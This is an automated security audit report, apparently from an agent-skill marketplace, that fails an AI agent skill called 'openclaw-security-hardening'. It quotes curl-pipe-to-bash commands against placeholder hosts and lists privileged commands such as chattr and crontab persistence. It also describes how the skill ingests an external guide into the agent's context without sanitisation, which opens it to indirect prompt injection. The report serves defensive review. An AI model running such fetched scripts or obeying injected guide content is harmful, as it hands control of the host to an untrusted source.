openclaw-security-hardening

Audit result: Fail

Audited by Gen Agent Trust Hub on May 16, 2026

Risk Level: HIGH
Categories: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill documentation includes examples of dangerous remote code execution patterns, specifically 'curl https://unknown-domain.com/script.sh | bash' and 'curl http://example.com/setup.sh | bash'. These are documented as 'Yellow Line' examples that the agent's defense mechanism should detect and flag for review, rather than instructions for the agent to execute unconditionally.
  • [COMMAND_EXECUTION]: The skill requires the agent to execute several high-privilege system commands to implement hardening, including:
      ◦ chattr +i: Used to make critical configuration files and the hash baseline immutable.
      ◦ crontab: Used to install a persistent nightly security audit script.
      ◦ md5sum: Used to generate and verify file integrity baselines.
      ◦ git: Used for disaster recovery and repository management.
  • [EXTERNAL_DOWNLOADS]: The skill clones the security guide from the SlowMist official GitHub repository (https://github.com/slowmist/openclaw-security-practice-guide.git). SlowMist is a recognized security firm, and this download is central to the skill's purpose.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection because it ingests and processes content from an external repository (the security guide) to define its behavior and safety rules.
      ◦ Ingestion points: Reads instructions from docs/OpenClaw-Security-Practice-Guide-v2.8.md inside the cloned repository.
      ◦ Boundary markers: None; the agent is instructed to 'assimilate' the guide directly into its context.
      ◦ Capability inventory: The skill possesses significant capabilities, including file system modification (chattr, cat), persistence via crontab, and network access via git and curl (referenced in examples).
      ◦ Sanitization: None; the skill relies on the integrity of the external documentation source.
Recommendations
  • HIGH: Downloads and executes remote code from: http://example.com/setup.sh, https://unknown-domain.com/script.sh - DO NOT USE without thorough review
Audit Metadata
Risk Level: HIGH
Analyzed: May 16, 2026, 02:32 PM
Security Audit — agent-trust-hub — openclaw-security-hardening